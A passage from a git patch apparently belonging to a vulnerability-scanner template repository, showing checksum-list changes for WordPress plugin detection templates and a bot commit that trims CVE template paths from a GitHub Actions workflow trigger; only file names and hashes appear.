+http/technologies/wordpress/plugins/intuitive-custom-post-order.yaml:a1363e721f2fe4ce39a3b05309da0f7c5addb465 http/technologies/wordpress/plugins/iwp-client.yaml:211621e7048b766fb8fc89837327329d606f1e50 -http/technologies/wordpress/plugins/jetpack-boost.yaml:f269f11fc6b0001926e72de4807cbd242ede08ce -http/technologies/wordpress/plugins/jetpack.yaml:09c1d93db9ac8495f225acb97333275e6029db24 -http/technologies/wordpress/plugins/kadence-blocks.yaml:f1ac28aba2bfd9577b654c675f9e3d1c41202d68 -http/technologies/wordpress/plugins/kirki.yaml:1ecd4767d21c7cb8d59965bfc6a0009630ca265b -http/technologies/wordpress/plugins/leadin.yaml:aa4f5f7df7968f0fd0d9fc5fe16aac6bf0bb6f67 -http/technologies/wordpress/plugins/limit-login-attempts-reloaded.yaml:16b519b1d7ae7667f88140efb4664cf36b9f340e -http/technologies/wordpress/plugins/limit-login-attempts.yaml:4897a7a2960120a2503d6301eeb793e4bb9a845c -http/technologies/wordpress/plugins/litespeed-cache.yaml:54bf8904a0d7c73b0f35fcbec3391f43f99361d7 -http/technologies/wordpress/plugins/loco-translate.yaml:db5f9a520c6a3e3349e13260001a60667816db17 -http/technologies/wordpress/plugins/loginizer.yaml:8ab50e95c6f5f5289350edf0f2d17b9ad61db271 +http/technologies/wordpress/plugins/jetpack-boost.yaml:7ada0ba0e1402f61160f703940af568bbdc5a78f +http/technologies/wordpress/plugins/jetpack.yaml:052e8123fe19a4ccbd88d7057b6220fc09bc49e5 +http/technologies/wordpress/plugins/kadence-blocks.yaml:462e77eee6dac513bd70e0d905c0430be341fc9a +http/technologies/wordpress/plugins/kirki.yaml:ee663466849a6e4a36b2e70523857761de9e4edc +http/technologies/wordpress/plugins/leadin.yaml:23f08928d76eb48d37b1fd9bbc17c729d533ebfb +http/technologies/wordpress/plugins/limit-login-attempts-reloaded.yaml:a7f5642dee515d041e6f09dcd42eead3aed66ba7 +http/technologies/wordpress/plugins/limit-login-attempts.yaml:3f9d5d7dc7e5ceee331b6ae8a8a280dd4937064c +http/technologies/wordpress/plugins/litespeed-cache.yaml:5be7ee817bf0054050bfd6590f987f5e6020acb9 +http/technologies/wordpress/plugins/loco-translate.yaml:3566c32068b67384b7867192b410b9af6fd8f958 +http/technologies/wordpress/plugins/loginizer.yaml:df5aaf6c0fc123cdf155860b02497d948055b5ab http/technologies/wordpress/plugins/loginpress.yaml:f3214f698e4519506749dc1c78c6c6f592d55cd7 -http/technologies/wordpress/plugins/mailchimp-for-woocommerce.yaml:6010c4ac2b0fa265a2ad482483fad79cd8daaa7d -http/technologies/wordpress/plugins/mailchimp-for-wp.yaml:8430b2c3de6f3710b7b6e628e3634aa1652ab329 -http/technologies/wordpress/plugins/mailpoet.yaml:7dea4daa32c55efe3ed5d0a5bb38d1eeb749fa85 -http/technologies/wordpress/plugins/maintenance.yaml:6f094bea818bb6fc6673769518d414fd3e272aac -http/technologies/wordpress/plugins/mainwp-child.yaml:c4ec3fdf78b3a5a2b59da232b8424fa396d8e101 -http/technologies/wordpress/plugins/malcare-security.yaml:2c0289f5e53680947b5906a32d91e5808087cd2b -http/technologies/wordpress/plugins/megamenu.yaml:19efe6e4b145fc4c10e51bb0ce8d49fca7ecbc05 -http/technologies/wordpress/plugins/members.yaml:df7ef4e57a53e8f495672bef21e4efc66ff2714f -http/technologies/wordpress/plugins/meta-box.yaml:201f452624420b1a23c75ecd83fc71b1fecd518b -http/technologies/wordpress/plugins/metform.yaml:7bd202c89e967d58ed38079468cfb1c80f430718 -http/technologies/wordpress/plugins/ml-slider.yaml:f6d562b56d2bc4f619aec728714350fc482d096f -http/technologies/wordpress/plugins/newsletter.yaml:2f9e6303b342a0b067964e5e183820d300052448 -http/technologies/wordpress/plugins/nextend-facebook-connect.yaml:b0616408adcf4ff89d5d0cf6465852028b806397 -http/technologies/wordpress/plugins/nextgen-gallery.yaml:63590c3cbe7f2683ae0493b2366a046401b4fb3d -http/technologies/wordpress/plugins/ninja-forms.yaml:ca6b256a98492387d92b466c9bb4d0dd066dfd42 -http/technologies/wordpress/plugins/ocean-extra.yaml:1545e2a315be1c662c0f275a3158548b03a9113f -http/technologies/wordpress/plugins/official-facebook-pixel.yaml:97dba8ac406a5e15fd7809130654991f01512a7f -http/technologies/wordpress/plugins/one-click-demo-import.yaml:8b5444ad4aa76bb680923263f5875a998cebb0a0 -http/technologies/wordpress/plugins/optinmonster.yaml:e24f4a6db15d694484d89c3599a13cd430d0df39 -http/technologies/wordpress/plugins/otter-blocks.yaml:5707737e37042ae6231b549f44993f9c9a02d6b1 -http/technologies/wordpress/plugins/password-protected.yaml:6d07835ad148e7788537f454e0b04c62de3aa773 -http/technologies/wordpress/plugins/pdf-embedder.yaml:634c063e2757dcf8a775e7017e16434592330911 +http/technologies/wordpress/plugins/mailchimp-for-woocommerce.yaml:772f0c28175630aec6a63eb504d2ea1b74a25dd2 +http/technologies/wordpress/plugins/mailchimp-for-wp.yaml:1c05f90eb50f3a8f072925cd0303e84b199e41ec +http/technologies/wordpress/plugins/mailpoet.yaml:76728bbd00bb646eec55a8a5e6c469a30a718300 +http/technologies/wordpress/plugins/maintenance.yaml:44bd53f11dedde34fbc81dd58604744f1d183223 +http/technologies/wordpress/plugins/mainwp-child.yaml:fbf0ec1689a90f783c8ceb02f7a04382c39309e5 +http/technologies/wordpress/plugins/malcare-security.yaml:5f2ef05bae54a6a05dba95fac2c45753422d9185 +http/technologies/wordpress/plugins/megamenu.yaml:3a3867b2e7000490acec8a1db0f7765ed9fc8fe1 +http/technologies/wordpress/plugins/members.yaml:ba857dc41e1d31243de30015c4d9470d42df8c53 +http/technologies/wordpress/plugins/meta-box.yaml:8c38bd4306888e54dc3391102d10fa72837e1043 +http/technologies/wordpress/plugins/metform.yaml:90f52dbae57fb96e16c98281f8524d0daf351e9e +http/technologies/wordpress/plugins/ml-slider.yaml:7ed06a67a393d9bf9c1354a894fa26bca17fd4a2 +http/technologies/wordpress/plugins/newsletter.yaml:3ee3c651239599cb45dcf220c7409494c9ebe9c3 +http/technologies/wordpress/plugins/nextend-facebook-connect.yaml:0c33021a4eefb6a660c593071371537361dfb84d +http/technologies/wordpress/plugins/nextgen-gallery.yaml:ea5e79cd98b84b48b69a0145227d4ec435ed5392 +http/technologies/wordpress/plugins/ninja-forms.yaml:eaafa820796d0c404ee59dd9efefab26c58c4624 +http/technologies/wordpress/plugins/ocean-extra.yaml:65228be6752d1dc95c05dd0a4c75209b04a41790 +http/technologies/wordpress/plugins/official-facebook-pixel.yaml:42b1aeba39e9d1062b8b35b5d6fc1c9ac92914f0 +http/technologies/wordpress/plugins/one-click-demo-import.yaml:9b10160492a86d235ec330579fdefa5eb92b1a95 +http/technologies/wordpress/plugins/optinmonster.yaml:cb72b324f850b87de1beac0dce1f120bd5e89a47 +http/technologies/wordpress/plugins/otter-blocks.yaml:1d77ec76194db956e207c4671a626de6fb1b20e7 +http/technologies/wordpress/plugins/password-protected.yaml:691f351480bb6cd23aa7afedf5dcde3862b61154 +http/technologies/wordpress/plugins/pdf-embedder.yaml:93ec0b4ddeff00afbd2b34a4e49371ceb2d4c48d http/technologies/wordpress/plugins/photo-gallery.yaml:37274dfdbd25ec4bcb7a3f79052c88d9df2c023e http/technologies/wordpress/plugins/php-compatibility-checker.yaml:9ae2457c7e9d21bee89ff0283903047bd188b93d -http/technologies/wordpress/plugins/pinterest-for-woocommerce.yaml:055ec079df0f1db8bcf98f61b1cc32a1545b3124 -http/technologies/wordpress/plugins/pixelyoursite.yaml:fe160d3b85661cc98b39a6f160fdc71ace9025cf -http/technologies/wordpress/plugins/polylang.yaml:461abf060464d1f1156ae018851a3d5885f64437 +http/technologies/wordpress/plugins/pinterest-for-woocommerce.yaml:ea3fc197949183230c36a54ec40ce7cec2ce05cb +http/technologies/wordpress/plugins/pixelyoursite.yaml:b5bbf81e5eb650342b3d4c2fca46310ee8801848 +http/technologies/wordpress/plugins/polylang.yaml:366f25da7da9f9f2f6aa349b25c24d9242b86c1a http/technologies/wordpress/plugins/popup-builder.yaml:468087ab250c0b356f499a501d5a948d709c9a05 -http/technologies/wordpress/plugins/popup-maker.yaml:c42624bd2d0a6fe32c44dfa5aeec1f72fbb67f67 -http/technologies/wordpress/plugins/post-smtp.yaml:3318419c8878c6a5471406f1068477aaf64431ed -http/technologies/wordpress/plugins/post-types-order.yaml:cce4e1aca5713ca2e01c24d6ca58a7e2ad725d9a -http/technologies/wordpress/plugins/premium-addons-for-elementor.yaml:9ad41511f810ec1b961597cc92d3d9f5814a049f -http/technologies/wordpress/plugins/pretty-link.yaml:b6420029464717c88095adcb274bfbb21a31ff6a -http/technologies/wordpress/plugins/really-simple-captcha.yaml:9ea3c881f6cd4cb290ee97100e57e030338e6df8 -http/technologies/wordpress/plugins/really-simple-ssl.yaml:185778d4a9541fd9b807e6f9067973f32bbde7f4 -http/technologies/wordpress/plugins/redirection.yaml:143567cc1c170bc0e54dc2ce98d9fbcf1b986550 -http/technologies/wordpress/plugins/redux-framework.yaml:12aea2336c6de788317ee468dc0e50303503d888 -http/technologies/wordpress/plugins/regenerate-thumbnails.yaml:ef4e355c741b4d60571670a27ef54003b5029a6e -http/technologies/wordpress/plugins/royal-elementor-addons.yaml:c35728b196a1d3b2bc3152770ca3c16ca33bfceb -http/technologies/wordpress/plugins/safe-svg.yaml:c74251162eeef443b61b36d29af9d2669de8057a -http/technologies/wordpress/plugins/seo-by-rank-math.yaml:38bff8fb87e87972ef44c3de609adcc6f392bf35 -http/technologies/wordpress/plugins/sg-cachepress.yaml:9e27de27ad9cf5e0b0615cb714cfb9896b5f7c89 -http/technologies/wordpress/plugins/sg-security.yaml:82bb31adf015d31279c57bab69972b98ba4d2ff7 -http/technologies/wordpress/plugins/shortcodes-ultimate.yaml:2b51340cb26c1f3359bb76277633209923a9af51 -http/technologies/wordpress/plugins/shortpixel-image-optimiser.yaml:46f0eaed430df7b0652bf9f0e68fcd66911878d5 -http/technologies/wordpress/plugins/simple-custom-post-order.yaml:53e694e88ab651a365cd9af45493b8e428f2a97c +http/technologies/wordpress/plugins/popup-maker.yaml:1c4cfb8a42e30c98281bc9a2f5c966d999c2a7d7 +http/technologies/wordpress/plugins/post-smtp.yaml:5146be93263e512b200ab784727f91612d5117f6 +http/technologies/wordpress/plugins/post-types-order.yaml:3691aaa9f183d9feef18ec4b069b169a96871b81 +http/technologies/wordpress/plugins/premium-addons-for-elementor.yaml:5eac1e84dd2eb1f27121ee409e9e4c6f69ed588c +http/technologies/wordpress/plugins/pretty-link.yaml:4f1ad7829fcfd53a4951657a3764f5d956eb18c9 +http/technologies/wordpress/plugins/really-simple-captcha.yaml:f76181edda9b3d62e3ea21bd51a4d5e4c450bef6 +http/technologies/wordpress/plugins/really-simple-ssl.yaml:bb7296600fad043c5a5fa3ea8c4d3de597e133bc +http/technologies/wordpress/plugins/redirection.yaml:f2fc65063eeb5b4f425e53c33e752b0acc46e8f1 +http/technologies/wordpress/plugins/redux-framework.yaml:af9b75a984712e6609f6bd94f956e026b9dc307b +http/technologies/wordpress/plugins/regenerate-thumbnails.yaml:c0fa1d1aece59d5d6e8e708f4b2d49e769998dd9 +http/technologies/wordpress/plugins/royal-elementor-addons.yaml:81ee3491d2caa18b8f476cbc4f8bdf6645f98857 +http/technologies/wordpress/plugins/safe-svg.yaml:7593c611e1da50fc587d7a34a6447f494d5cddb8 +http/technologies/wordpress/plugins/seo-by-rank-math.yaml:91918b715b41c561ccd6da01b15c5710ceefd48d +http/technologies/wordpress/plugins/sg-cachepress.yaml:86a47e535c821c5c1af37c73687729982a7e8256 +http/technologies/wordpress/plugins/sg-security.yaml:e833734b1006bc06ee6c86a825b3902ec67fb113 +http/technologies/wordpress/plugins/shortcodes-ultimate.yaml:55d132c332394a78efb0b3130261bf37cc0612d2 +http/technologies/wordpress/plugins/shortpixel-image-optimiser.yaml:196c39da6c914816c14f11df5fc9106d9439f200 +http/technologies/wordpress/plugins/simple-custom-post-order.yaml:f7959e70ca5912ffccbe8bfb5aaf69f15dea94ad http/technologies/wordpress/plugins/simple-history.yaml:446824d0a69fc495005942a3e32febdca2e7dfb1 http/technologies/wordpress/plugins/simple-page-ordering.yaml:7d96ac56d7ed2ed031b6789429888ef703d39538 -http/technologies/wordpress/plugins/siteguard.yaml:3316f41749701dbb9c87119b51fa86853fc2fdd1 -http/technologies/wordpress/plugins/siteorigin-panels.yaml:382aaa3c60d593b45f2acce717c58d71bb63db0b -http/technologies/wordpress/plugins/smart-slider-3.yaml:915999f961d683e82aa581571f4e297662d117e2 -http/technologies/wordpress/plugins/so-widgets-bundle.yaml:1c691ec52ceaa2cdf934e769c3d657f3cacf03a9 +http/technologies/wordpress/plugins/siteguard.yaml:1603622bb764bbd891fa245b1fb0851d8443eec0 +http/technologies/wordpress/plugins/siteorigin-panels.yaml:bdd37fdd569c13441fb87d5a310a8beca53ecead +http/technologies/wordpress/plugins/smart-slider-3.yaml:6669412fae6e1f830d8132df4b3ad7036fa95746 +http/technologies/wordpress/plugins/so-widgets-bundle.yaml:9e123d8b5122703a197a8279f6b6612af707aa1f http/technologies/wordpress/plugins/ssl-insecure-content-fixer.yaml:aab70fa0f4b1c898371aa4af959db60e6cc733dd -http/technologies/wordpress/plugins/sticky-header-effects-for-elementor.yaml:b0b73d38068e1623ed4262dab78ba9b3dd0eaa31 -http/technologies/wordpress/plugins/stops-core-theme-and-plugin-updates.yaml:8cbf2f2b489ee46245bb62d7ac5b2298a7eef61a -http/technologies/wordpress/plugins/sucuri-scanner.yaml:36dfadf3eaf00de528be16f12f3e34aa617dd6da +http/technologies/wordpress/plugins/sticky-header-effects-for-elementor.yaml:218b764f5e7ec74be15c072c6dcef4976de6d79b +http/technologies/wordpress/plugins/stops-core-theme-and-plugin-updates.yaml:48e485435630e99bcc197171a946575b47361c73 +http/technologies/wordpress/plugins/sucuri-scanner.yaml:73a5d57f8a22ede9c4de7d3fba4f1aeaa4c4bb2e http/technologies/wordpress/plugins/svg-support.yaml:da47523057818a5fd4aa3e9d06c98c4f452f4222 -http/technologies/wordpress/plugins/table-of-contents-plus.yaml:334733285e3627f5416feca5df9dd89ac91faf4f -http/technologies/wordpress/plugins/tablepress.yaml:f3fcc4bad9199cd1aca78c75a093d7b23e4b65b7 -http/technologies/wordpress/plugins/taxonomy-terms-order.yaml:c0491d20b5b59729545cdf68cfb88346172acb75 -http/technologies/wordpress/plugins/templately.yaml:5b62413b897c47d3ae86d5e5b92ee75ceaf0856e -http/technologies/wordpress/plugins/the-events-calendar.yaml:87f10f88c8e44bc416536092aa5d591554817b0c +http/technologies/wordpress/plugins/table-of-contents-plus.yaml:e9ca166f376b599e787a66db6114262e2a888811 +http/technologies/wordpress/plugins/tablepress.yaml:1907c25a373a78ea4c81d21eae209acb12104a9b +http/technologies/wordpress/plugins/taxonomy-terms-order.yaml:a8ac16c00a1fe225e48ebe24c94aba1323e1e584 +http/technologies/wordpress/plugins/templately.yaml:85704028e9e8d3e3a3ca74af306a32d502c4388d +http/technologies/wordpress/plugins/the-events-calendar.yaml:52c6ff41c4bd34154268728639cfa0e3b4f8d8ab http/technologies/wordpress/plugins/themeisle-companion.yaml:c706aef04e5b9ce414f460819eca30bb3bcb00e5 -http/technologies/wordpress/plugins/tinymce-advanced.yaml:76022e8f7ef5517e05c6c59e573a7bfa55b4c121 -http/technologies/wordpress/plugins/translatepress-multilingual.yaml:adb0d3eafbafe1195ddb6477095d704778a8dc1a -http/technologies/wordpress/plugins/ultimate-addons-for-gutenberg.yaml:975e3a1099ec6fad3eccc2566820dcf1e685ffda -http/technologies/wordpress/plugins/under-construction-page.yaml:3732901ea346a990c983d862b72b632cc1a09ae1 +http/technologies/wordpress/plugins/tinymce-advanced.yaml:9e6bb4ae3c2a1718e019e5374810c6b9e64fa3f5 +http/technologies/wordpress/plugins/translatepress-multilingual.yaml:97b7e9a9b4b15aff49cca7d5e725392e7bf627fd +http/technologies/wordpress/plugins/ultimate-addons-for-gutenberg.yaml:9c37c0d9262b2938015364f494651b05b0fa6033 +http/technologies/wordpress/plugins/under-construction-page.yaml:c76e58a7cf7365aaaa3685531874f5d2ea3d1b68 http/technologies/wordpress/plugins/unyson.yaml:e01d9f525f3cf577ab43441c694230c07608611e -http/technologies/wordpress/plugins/updraftplus.yaml:192fcb7b7fb8ab505313883440bf4b56cc8b8199 +http/technologies/wordpress/plugins/updraftplus.yaml:5050d66d21b2380882e67332a769bc7da06154e6 http/technologies/wordpress/plugins/use-any-font.yaml:e1c358a86017c4c3f5abe62d76da6878d61f5d47 -http/technologies/wordpress/plugins/user-role-editor.yaml:9a07be64d03f0057f9f3418b4e2f22af3fe3c8e4 +http/technologies/wordpress/plugins/user-role-editor.yaml:65b055fb6332b2169a9e7143591f116c146e06a8 http/technologies/wordpress/plugins/velvet-blues-update-urls.yaml:1a6d9e7560dba5c9471c20cffdf0ba1b098fbb7c -http/technologies/wordpress/plugins/w3-total-cache.yaml:32fc287b225ee5187b29fa9db688b3e8a10de4a3 -http/technologies/wordpress/plugins/webp-converter-for-media.yaml:f5ef65853e4102642c561aefb18f4a2a3cf738b3 -http/technologies/wordpress/plugins/webp-express.yaml:cb2c692702481e29e279b3efafa91942c342b22c -http/technologies/wordpress/plugins/widget-importer-exporter.yaml:5483fa8794ae7790c5c42c689a9f754ea3f07b66 -http/technologies/wordpress/plugins/woo-cart-abandonment-recovery.yaml:731ab6979ce9daafb6945d57a294575a4e16ee00 -http/technologies/wordpress/plugins/woo-checkout-field-editor-pro.yaml:e0edbe4345b9310bf43798ae0da56ca339fac2a2 -http/technologies/wordpress/plugins/woo-variation-swatches.yaml:f639503d1041219d839f06177a93cc4e1c125683 +http/technologies/wordpress/plugins/w3-total-cache.yaml:e6d76a664a5009598ce3e2d6f3b412667c9cacef +http/technologies/wordpress/plugins/webp-converter-for-media.yaml:305690e415de547348ac36cf0d9544b347b16a38 +http/technologies/wordpress/plugins/webp-express.yaml:fcb956491146843be9f3b5f152965cc0796f75e8 +http/technologies/wordpress/plugins/widget-importer-exporter.yaml:ffa48fc0f80ceb41dff2b5c69116837b0111e074 +http/technologies/wordpress/plugins/woo-cart-abandonment-recovery.yaml:6db1302965c217cd38e160295fd9d7defa47afa9 +http/technologies/wordpress/plugins/woo-checkout-field-editor-pro.yaml:c2b6a592df83eb0b6abbfa988893633cb948b997 +http/technologies/wordpress/plugins/woo-variation-swatches.yaml:68f2dd5d2776de335efc273ddf2249b507527398 http/technologies/wordpress/plugins/woocommerce-gateway-paypal-express-checkout.yaml:4f2c82ad5cf98659804bd115d05bf9db8461e200 -http/technologies/wordpress/plugins/woocommerce-gateway-stripe.yaml:008839d74144ff033f920547a96bca6cfc81c4f0 -http/technologies/wordpress/plugins/woocommerce-legacy-rest-api.yaml:6629c332ea3550d95e79b63dbbbc1490c6498e79 -http/technologies/wordpress/plugins/woocommerce-payments.yaml:be1f5158fe2d84e9d0bbc38f555c0c0744991a57 -http/technologies/wordpress/plugins/woocommerce-paypal-payments.yaml:649f5ae860b1b699c6278b929f2bf6f1f4b01dd5 -http/technologies/wordpress/plugins/woocommerce-pdf-invoices-packing-slips.yaml:bdf13f27fd04f4b55c741da62a8394bf501cc988 -http/technologies/wordpress/plugins/woocommerce-services.yaml:db3ba138c78b428608a2297fa163fc8242bd41e1 -http/technologies/wordpress/plugins/woocommerce.yaml:3d54c5afdbb12b79862abe00f70cc4e88157aebd -http/technologies/wordpress/plugins/wordfence.yaml:6c9fed80955cabc719854bd25f58bd0690160f35 -http/technologies/wordpress/plugins/wordpress-importer.yaml:31bb724946ce8b3f1910d411ef6cceb3a82299d0 -http/technologies/wordpress/plugins/wordpress-seo.yaml:e391bccb91671e970aad5f3c5e39ce6ff7843635 +http/technologies/wordpress/plugins/woocommerce-gateway-stripe.yaml:9929d037d9f1459cff16926d024bcf666c50edda +http/technologies/wordpress/plugins/woocommerce-legacy-rest-api.yaml:e7b3acf574cd1dc2b9d4f7a6240769a83a938856 +http/technologies/wordpress/plugins/woocommerce-payments.yaml:60a3ada3d5bd510f77eb3a77c32d88ad20e997bc +http/technologies/wordpress/plugins/woocommerce-paypal-payments.yaml:910d708b1ffe8da5c48584f0aab2d3f06e479cec +http/technologies/wordpress/plugins/woocommerce-pdf-invoices-packing-slips.yaml:d3b1a70c5b241c5776101bdf5fb0ee9753725d4b +http/technologies/wordpress/plugins/woocommerce-services.yaml:6f9a1c3b761936c259c9e29ee32d28f691ae8b77 +http/technologies/wordpress/plugins/woocommerce.yaml:8231905d6d899f1da3fe5641cb3908eac4c1113f +http/technologies/wordpress/plugins/wordfence.yaml:43d1eb1e1e314aa16d9c1d5d0d5d4c59de91ac1b +http/technologies/wordpress/plugins/wordpress-importer.yaml:c7ba561f2a03d75e5f929c367ecdce158d4e456f +http/technologies/wordpress/plugins/wordpress-seo.yaml:a9de56a1598eaa8ab15ab968f734d71fdf2bc107 http/technologies/wordpress/plugins/wordpress-woosidebars.yaml:679cd62c97446d90fc7fbb50f64403cb10c4c319 -http/technologies/wordpress/plugins/worker.yaml:cbc1aab969c2ee6c8967ba58da4bf82c9813e057 -http/technologies/wordpress/plugins/wp-crontrol.yaml:6768e8111ee4bc3e03ea010ec819c8ae89307aac -http/technologies/wordpress/plugins/wp-fastest-cache.yaml:c2f61ee62a8964c5c665f984215149110f742a37 -http/technologies/wordpress/plugins/wp-file-manager.yaml:0e6e0081e9084d64463458aa9be206502c567da5 -http/technologies/wordpress/plugins/wp-google-maps.yaml:e62d6ddece58a5ba16e84216c1f63ac36968f316 -http/technologies/wordpress/plugins/wp-mail-smtp.yaml:c467ee5cbfdd02c5adcfa98a7695e5122f9c2d2c -http/technologies/wordpress/plugins/wp-maintenance-mode.yaml:48e332cad9a1d19a2aabf67fe98f4ae3adafdbbc -http/technologies/wordpress/plugins/wp-migrate-db.yaml:806081b68fa7cf5077fd49ddc5630c2e2c71fee5 -http/technologies/wordpress/plugins/wp-multibyte-patch.yaml:c2b7fa89f79127f934f19ea45bb77caef8a80809 -http/technologies/wordpress/plugins/wp-optimize.yaml:0a7ca3353d41c8c3e8b5447a33c39423fce4187f -http/technologies/wordpress/plugins/wp-pagenavi.yaml:c84a6d103d3de849c9ed0555d2ad69c28c1eab9a -http/technologies/wordpress/plugins/wp-reset.yaml:896010702419036225035602aedd392d3350e47c -http/technologies/wordpress/plugins/wp-reviews-plugin-for-google.yaml:e82e8cfc2c9bacad123dd83835d3e962a4414424 -http/technologies/wordpress/plugins/wp-rollback.yaml:3d91677de85deea74983f64d511e1b1493cfc670 -http/technologies/wordpress/plugins/wp-seopress.yaml:da1a42691d0ae6be2fc8d2eaa4647d1f19cab43c -http/technologies/wordpress/plugins/wp-sitemap-page.yaml:11620a242ece44fa6104a9af139a0265b0fb69dd -http/technologies/wordpress/plugins/wp-smushit.yaml:cb1f05141b8da2beab64f4021338330a8d4ddd8d -http/technologies/wordpress/plugins/wp-statistics.yaml:9cb105762cd4672310a48a26249f9ee2c1f9ba7a -http/technologies/wordpress/plugins/wp-super-cache.yaml:76463e3816905d47b9a1ecad6f91c84300906d0d +http/technologies/wordpress/plugins/worker.yaml:eec5a16391040875785d932499c9f260e8efeb8c +http/technologies/wordpress/plugins/wp-crontrol.yaml:a95b9be19c9a370db0c2ada00abb45799a890083 +http/technologies/wordpress/plugins/wp-fastest-cache.yaml:3bac8419d21ce83693d583293fb12b438a544402 +http/technologies/wordpress/plugins/wp-file-manager.yaml:227e50238a78872a0caf5ac0c54ab4d4fa33be67 +http/technologies/wordpress/plugins/wp-google-maps.yaml:f398fe5460d8180c0e85568b79baa92355130348 +http/technologies/wordpress/plugins/wp-mail-smtp.yaml:3c08f95f3bce5c44e7c5ebda373c397d0ddb8342 +http/technologies/wordpress/plugins/wp-maintenance-mode.yaml:d7bb63c19f2338fd77cfa210fc4fa2e2c8bbff85 +http/technologies/wordpress/plugins/wp-migrate-db.yaml:996eb41fddbc34f6078ebecc34cececbb6eec504 +http/technologies/wordpress/plugins/wp-multibyte-patch.yaml:252c64b3711943bbfd6d507669f1175f2225cbb2 +http/technologies/wordpress/plugins/wp-optimize.yaml:7d8bae34481b9723031a3574ce49620e76ad88ec +http/technologies/wordpress/plugins/wp-pagenavi.yaml:2a1f36db756a5f86740144301429285d3c50fee9 +http/technologies/wordpress/plugins/wp-reset.yaml:28019b1d96d3d4c456ac774c3e5cdeb666b06859 +http/technologies/wordpress/plugins/wp-reviews-plugin-for-google.yaml:6100c61e48b0e15a0971d15714bdefa28c1fedcc +http/technologies/wordpress/plugins/wp-rollback.yaml:f7b2f501eb11a44d43b23d3933c06fe15927b2ca +http/technologies/wordpress/plugins/wp-seopress.yaml:1f1aa346cc5d9b8f6c766a4d6388dc8f90e34030 +http/technologies/wordpress/plugins/wp-sitemap-page.yaml:a4e9a4bb7976f9cab3829e15f7cf6a476a2e3792 +http/technologies/wordpress/plugins/wp-smushit.yaml:cff5012e05d9eca8dae054e4d73667340c631ddb +http/technologies/wordpress/plugins/wp-statistics.yaml:db2b26951dec4a78053fac69af816940d49cda0b +http/technologies/wordpress/plugins/wp-super-cache.yaml:312d5ce63e6b319b2688eb416664e575699fe649 http/technologies/wordpress/plugins/wp-user-avatar.yaml:a8aa0e902ead01de33b23343603d18b63829517e -http/technologies/wordpress/plugins/wpcf7-recaptcha.yaml:3be56d7fb0ddbfcdff606c21ba2eaf1a884c849b -http/technologies/wordpress/plugins/wpcf7-redirect.yaml:6c85af103bde9cb10c025a9302bb6f9613cc84eb -http/technologies/wordpress/plugins/wpforms-lite.yaml:6f3b08859873ef78b2a257fd3cc5d6360c6e4fca -http/technologies/wordpress/plugins/wps-hide-login.yaml:c1bab37bd47f9049452add340af21e656debd1db -http/technologies/wordpress/plugins/wpvivid-backuprestore.yaml:e629246d07264a041798ed6919cd6f787548381e +http/technologies/wordpress/plugins/wpcf7-recaptcha.yaml:a9acaa8bc79b55109355d8894c249b6e99fba870 +http/technologies/wordpress/plugins/wpcf7-redirect.yaml:da8bff7c82756e3e1ac6810a8eb2ef194d109a43 +http/technologies/wordpress/plugins/wpforms-lite.yaml:cf27de8a9131c5a7427c0f9d3f4bfd5f378e26eb +http/technologies/wordpress/plugins/wps-hide-login.yaml:faf97e5fb87bd43caaa123bb77e5cb64d218f00d +http/technologies/wordpress/plugins/wpvivid-backuprestore.yaml:f03291859093b6ab5196a683c017e300566beb9d http/technologies/wordpress/plugins/yith-woocommerce-compare.yaml:caf39ccc6507df09c0816caa7af29404c193d9a5 -http/technologies/wordpress/plugins/yith-woocommerce-wishlist.yaml:7d47684a8d95444348f59a10ee1e2be73c6dd06a +http/technologies/wordpress/plugins/yith-woocommerce-wishlist.yaml:c3474b242e88f3dd31b5317051e69194f36317f9 http/technologies/wordpress/themes/wp-bricks-builder-theme.yaml:0b85e26615c692bab9ceb5ae74dc9adec4097b9e http/technologies/wordpress-detect.yaml:a0148caf9d3f957171e7b75d4382dc7d54e454e5 http/technologies/workerman-websocket-detect.yaml:1396bc8234c4f538d5f57966b6b8084fe68f574f @@ -8929,7 +8930,7 @@ ssl/tls-version.yaml:4e40f08efbb39172b9280ea9e26ca5f0a14a575a ssl/untrusted-root-certificate.yaml:a91d36990a1d052f5ee64d170ad8f084d38dab19 ssl/weak-cipher-suites.yaml:62fe808d9dfafda67c410e6cb9445fdc70257e89 ssl/wildcard-tls.yaml:d244f62c7bd22d3868fc6fc7cb9550af6b261210 -templates-checksum.txt:c1c330aa63ecaaa885252cc777746f16f8fcd449 +templates-checksum.txt:ce0147367966fefab24b30b1fb5725ff3a276604 vulnerabilities/thinkphp/thinkphp6-arbitrary-write.yaml:cf90225cf0bd54905ceefa1a5827a5dc4b8c4099 wappalyzer-mapping.yml:7f03bd65baacac20c1dc6bbf35ff2407959574f1 workflows/74cms-workflow.yaml:bb010e767ad32b906153e36ea618be545b4e22d0 From cb619ab0af593795d4ba5d13d73034cffca9f265 Mon Sep 17 00:00:00 2001 From: "[PDBot]" <bot@projectdiscovery.io> Date: Fri, 26 Jul 2024 13:03:06 +0000 Subject: [PATCH 1677/1841] Syncing Templates --- .github/workflows/templates-sync.yml | 68 +--------------------------- 1 file changed, 1 insertion(+), 67 deletions(-) diff --git a/.github/workflows/templates-sync.yml b/.github/workflows/templates-sync.yml index 15ea9164cc..696d09af35 100644 --- a/.github/workflows/templates-sync.yml +++ b/.github/workflows/templates-sync.yml @@ -3,73 +3,7 @@ on: push: paths: - '.new-additions' - - 'headless/2024/CVE-2024-38526.yaml' - - 'http/cnvd/2023/CNVD-2023-72138.yaml' - - 'http/cves/2022/CVE-2022-34267.yaml' - - 'http/cves/2022/CVE-2022-38322.yaml' - - 'http/cves/2022/CVE-2022-45269.yaml' - - 'http/cves/2023/CVE-2023-2309.yaml' - - 'http/cves/2023/CVE-2023-29204.yaml' - - 'http/cves/2023/CVE-2023-4220.yaml' - - 'http/cves/2023/CVE-2023-43662.yaml' - - 'http/cves/2023/CVE-2023-44012.yaml' - - 'http/cves/2023/CVE-2023-4450.yaml' - - 'http/cves/2023/CVE-2023-48728.yaml' - - 'http/cves/2024/CVE-2024-1512.yaml' - - 'http/cves/2024/CVE-2024-2330.yaml' - - 'http/cves/2024/CVE-2024-32238.yaml' - - 'http/cves/2024/CVE-2024-34257.yaml' - - 'http/cves/2024/CVE-2024-34351.yaml' - - 'http/cves/2024/CVE-2024-3742.yaml' - - 'http/cves/2024/CVE-2024-37843.yaml' - - 'http/cves/2024/CVE-2024-38289.yaml' - - 'http/cves/2024/CVE-2024-39250.yaml' - - 'http/cves/2024/CVE-2024-39914.yaml' - - 'http/cves/2024/CVE-2024-40348.yaml' - - 'http/cves/2024/CVE-2024-4257.yaml' - - 